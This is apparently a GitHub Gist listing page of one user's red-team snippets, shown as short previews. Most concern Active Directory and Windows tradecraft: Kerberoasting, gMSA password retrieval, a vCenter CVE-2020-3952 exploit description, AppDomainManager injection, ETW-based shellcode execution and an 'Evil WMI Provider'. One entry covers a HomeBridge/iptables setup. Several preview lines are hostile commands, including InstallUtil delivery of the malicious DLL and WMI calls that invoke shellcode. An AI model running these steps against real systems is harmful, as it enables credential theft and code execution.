Skip to content

Instantly share code, notes, and snippets.

NotMedic /
Created November 7, 2019 20:10
Headless Remote Chrome Debugging - Ichabod Chrome :)


Start Chrome with the following flags:

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"



NotMedic / Invoke-Kerberoast.ps1
Created May 6, 2021 21:12 — forked from jaredhaight/Invoke-Kerberoast.ps1
Get Kerberoastable SPNs
Author: Will Schroeder (@harmj0y), @machosec
License: BSD 3-Clause
Required Dependencies: None
Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (
Note: the primary method of use will be Invoke-Kerberoast with various targeting options.
NotMedic / Notes.txt
Created January 15, 2020 14:04
Group Managed Service Account Password Retrieval
#Install the DSInterals Powershell Module
Install-Module -Name DSInternals -Force
#Import it.
Import-Module DSInternals
#Identify which users can recover the GMSA Account's Password. Compromise one of those Principals.
Get-ADServiceAccount -Identity GMSAccount -Properties PrincipalsAllowedToRetrieveManagedPassword
NotMedic / Instructions.txt
Created December 2, 2018 02:29
Siri -> HomeBridge -> HomeBridge-ssh -> iptables
This is a pretty simple setup:
Siri is used to control Homebridge using the HomeKit protocol.
Homebridge has a module named Homebridge-ssh that allows you to run commands over ssh.
There is a shell script on an OpenWrt box to enable, disable, and check the status of a MAC Address block in the FORWARD table.
1. Install node on your platform. I went with 8.9 for no specific reason other than I initially had issues with 10 that probably weren't related..
2. Install homebridge and homebridge-ssh. You should probably also put hombridge-config-ui-x on there too... I used the unsafe-perm parameter after getting a significant number of errors:
sudo -i npm install -g homebridge --unsafe-perm
sudo -i npm install -g homebridge-ssh --unsafe-perm
NotMedic /
Created April 28, 2020 14:00 — forked from praseodym/
Exploit for VMware vCenter Directory Service (vmdir) - CVE-2020-3952 / VMSA-2020-0006

Exploit for VMware vCenter Directory Service (vmdir) - CVE-2020-3952 / VMSA-2020-0006

This is my proof-of-concept exploit code for the VMware vCenter Directory Service (vmdir) sensitive information disclosure vulnerability (CVE-2020-3952 / VMSA-2020-0006).

It turns out that the vmdir service, which provides an LDAP directory server (and more), allows anonymous LDAP connections (also called LDAP binding) in the ACL MODE: Legacy configuration that is present after upgrading from vCenter 6.5. While the LDAP tree doesn't expose password hashes for administrative users, it does expose the VMware SSO server's SAML identity provider (IdP) certificates and private key. This key can be downloaded and used to sign arbitrary SAML responses, allowing an attacker to

NotMedic /
Created May 15, 2020 17:12
GhostLoader - AppDomainManager - Injection - 攻壳机动队

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
NotMedic / EtwpTest.cs
Created May 15, 2020 17:14
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace EtwpTest
class Program
static void Main(string[] args)
NotMedic / EvilWMIProvider.cs
Created May 18, 2020 14:35 — forked from TheWover/EvilWMIProvider.cs
Evil WMI Provider
// Based On LocalAdmin WMI Provider by Roger Zander
// Adapted For Evil By @subTee
// Executes x64 ShellCode
// Deliver and Install dll
// C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll
// Invoke calc for SYSTEM level calculations
// Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode
// Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null
NotMedic / Get-KerberosTicketGrantingTicket.ps1
Created July 2, 2020 15:34 — forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
function Get-KerberosTicketGrantingTicket
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets.
NotMedic / TestAssembly.cs
Last active July 23, 2020 15:39 — forked from Arno0x/TestAssembly.cs
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
using System.Windows.Forms;
namespace TestNamespace